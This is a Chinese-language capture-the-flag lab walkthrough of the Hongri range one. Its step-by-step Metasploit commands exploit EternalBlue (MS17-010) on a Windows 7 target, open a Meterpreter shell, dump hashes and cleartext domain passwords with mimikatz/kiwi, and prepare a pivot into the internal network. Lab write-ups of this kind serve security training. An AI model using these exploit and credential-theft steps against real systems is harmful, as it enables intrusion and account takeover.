红日靶场一有两种 Getshell 方式
方法一:木马反弹 shell
方法二:永恒之蓝
由于方法一过于简单,这里尝试使用 msf6 及永恒之蓝漏洞
在这之前可以使用 nmap 扫描一下端口开启情况,我这里直接使用 Goby 进行一个扫
加载 MS17_010 扫描模块开扫
msf6 > use auxiliary/scanner/smb/smb_ms17_010 msf6 auxiliary(scanner/smb/smb_ms17_010) > set rhost 192.168.239.63 rhost => 192.168.239.63 msf6 auxiliary(scanner/smb/smb_ms17_010) > run [+] 192.168.239.63:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit) [*] 192.168.239.63:445 - Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed
确认存在永恒之蓝漏洞
加载永恒之蓝攻击模块
msf6 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue [*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/bind_tcp payload => windows/x64/meterpreter/bind_tcp msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhost 192.168.239.63 rhost => 192.168.239.63 msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit
[*] 192.168.239.63:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check [+] 192.168.239.63:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit) [*] 192.168.239.63:445 - Scanned 1 of 1 hosts (100% complete) [+] 192.168.239.63:445 - The target is vulnerable. [*] 192.168.239.63:445 - Connecting to target for exploitation. [+] 192.168.239.63:445 - Connection established for exploitation. [+] 192.168.239.63:445 - Target OS selected valid for OS indicated by SMB reply [*] 192.168.239.63:445 - CORE raw buffer dump (42 bytes) [*] 192.168.239.63:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes [*] 192.168.239.63:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv [*] 192.168.239.63:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1 [+] 192.168.239.63:445 - Target arch selected valid for arch indicated by DCE/RPC reply [*] 192.168.239.63:445 - Trying exploit with 17 Groom Allocations. [*] 192.168.239.63:445 - Sending all but last fragment of exploit packet [*] 192.168.239.63:445 - Starting non-paged pool grooming [+] 192.168.239.63:445 - Sending SMBv2 buffers [+] 192.168.239.63:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer. [*] 192.168.239.63:445 - Sending final SMBv2 buffers. [*] 192.168.239.63:445 - Sending last fragment of exploit packet! [*] 192.168.239.63:445 - Receiving response from exploit packet [+] 192.168.239.63:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)! [*] 192.168.239.63:445 - Sending egg to corrupted connection. [*] 192.168.239.63:445 - Triggering free of corrupted buffer. [*] Sending stage (200262 bytes) to 192.168.239.63 [*] Meterpreter session 1 opened (192.168.2.15:42585 -> 192.168.239.63:4444 ) at 2022-05-12 04:57:11 -0400 [+] 192.168.239.63:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [+] 192.168.239.63:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [+] 192.168.239.63:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= meterpreter >
多尝试几次获取了权限,由于是内网与靶机隔了一个网段无法反向 shell,于是手动关闭了防火墙进行了正向 shell 的连接
然后进行权限提升
meterpreter > sysinfo Computer : STU1 OS : Windows 7 (6.1 Build 7601, Service Pack 1). Architecture : x64 System Language : zh_CN Domain : GOD Logged On Users : 2 Meterpreter : x64/windows meterpreter > getuid Server username: NT AUTHORITY\SYSTEM meterpreter > getsystem [-] Already running as SYSTEM
发现已经是 system 权限了,我们直接 getsystem 就好
PS:后期不知道为什么 creds_all 模块用不了,顺便前面迁移个进程吧,有些 32 位的 meterpreter 可能载入模块有点问题
将 meterpreter 迁移去 64 位进程
meterpreter > ps Process List ============ PID PPID Name Arch Session User Path --- ---- ---- ---- ------- ---- ---- ···· 612 488 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\sv ox.exe ···· meterpreter > migrate 612 [*] Migrating from 648 to 612... [*] Migration completed successfully. meterpreter > getsystem [-] Already running as SYSTEM
hashdump 输出密码 hash,或者载入 kiwi 模块直接获取所有密码
meterpreter > hashdump Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: liukaifeng01:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: meterpreter > load kiwi Loading extension kiwi... .#####. mimikatz 2.2.0 20191125 (x64/windows) .## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) ## \ / ## > http://blog.gentilkiwi.com/mimikatz '## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com ) '#####' > http://pingcastle.com / http://mysmartlogon.com ***/ Success. meterpreter > Interrupt: use the 'exit' command to meterpreter > creds_all [+] Running as SYSTEM [*] Retrieving all credentials [-] Error running command creds_all: ActiveRecord::RecordInvalid Validation failed: Data is not in the NTLMHash data format of :, where each hex digest is 32 lowercase hexadecimal characters. meterpreter >
2022/5/20 PS:再一次尝试又可以了,可能是 Kali 内核的问题,我换了个 kali 版本就跑出来了
meterpreter > creds_all [+] Running as SYSTEM [*] Retrieving all credentials msv credentials =============== Username Domain LM NTLM SHA1 -------- ------ -- ---- ---- Administrator GOD edea194d76c77d87923b 8c535a2d84c3b21059d6 eea06a1ec2e153a9441c6 4276177762ae 67639bb89db5 6e6fc4f55bce155cba9 STU1$ GOD ac41fb70fbcd369d67cf 2ca7a7350a1e590da1e04 0f4b8c899583 af042387378a9d351f0 wdigest credentials =================== Username Domain Password -------- ------ -------- (null) (null) (null) Administrator GOD hongrisec@2022 STU1$ GOD ... tspkg credentials ================= Username Domain Password -------- ------ -------- Administrator GOD hongrisec@2022 kerberos credentials ==================== Username Domain Password -------- ------ -------- (null) (null) (null) Administrator GOD.ORG hongrisec@2022 stu1$ GOD.ORG ...
还是不知道报什么错,于是上网找了另一种方法,kiwi_cmd 可以调用 mimikatz 模块的所有功能
meterpreter > kiwi_cmd sekurlsa::logonpasswords ···· msv : [00000003] Primary * Username : Administrator * Domain : GOD * LM : edea194d76c77d87840ac10a764c7362 * NTLM : 8a963371a63944419ec1adf687bb1be5 * SHA1 : 343f44056ed02360aead5618dd42e4614b5f70cf tspkg : * Username : Administrator * Domain : GOD * Password : hongrisec@2019 wdigest : * Username : Administrator * Domain : GOD * Password : hongrisec@2019 kerberos : * Username : Administrator * Domain : GOD.ORG * Password : hongrisec@2019 ssp : credman : ····
2022/5/29 书接上回:
已经有不少东西发生了改变了,所以接下来的密码之类的可能和上面展示的有所不同
由于是 Windows 7 主机,可以尝试开启下 3389 的 Rdp 端口
meterpreter > run post/windows/manage/enable_rdp [*] Enabling Remote Desktop [*] RDP is already enabled [*] Setting Terminal Services service startup mode [*] Terminal Services service is already set to auto [*] Opening port in local firewall if necessary [*] For cleanup execute Meterpreter resource file: /home/kali/.msf4/loot/20220529040006_default_192.168.239.53_host.windows.cle_201935.txt
这里已经被我小伙伴先行一步打开了
尝试下远程登陆
rdesktop -g 1440x900 -r disk:LinuxxDisk=/root/Downloads -u STU1 -p "hongrisec@2022" 192.168.239.53 rdesktop -g 1440x900 -r disk:LinuxxDisk=/root/Downloads -u Administrator -p "hongrisec@2022" 192.168.239.53
好像 Rdp 都登录不进去,可能是限制了域,那就找别的办法,可以直接添加路由,挂 Socks 代理
ipconfig /all 查看所有内网网段
meterpreter > ipconfig /all ··· Interface 11 ============ Name : Intel(R) PRO/1000 MT Network Connection Hardware MAC : 00:0c:29:c2:e7:1b MTU : 1500 IPv4 Address : 192.168.52.143 IPv4 Netmask : 255.255.255.0 ··· Interface 25 ============ Name : Intel(R) PRO/1000 MT Network Connection #2 Hardware MAC : 00:0c:29:c2:e7:25 MTU : 1500 IPv4 Address : 192.168.239.53 IPv4 Netmask : 255.255.255.0 ···
发现其内网还有一个网段,那么直接考虑将其代理出来
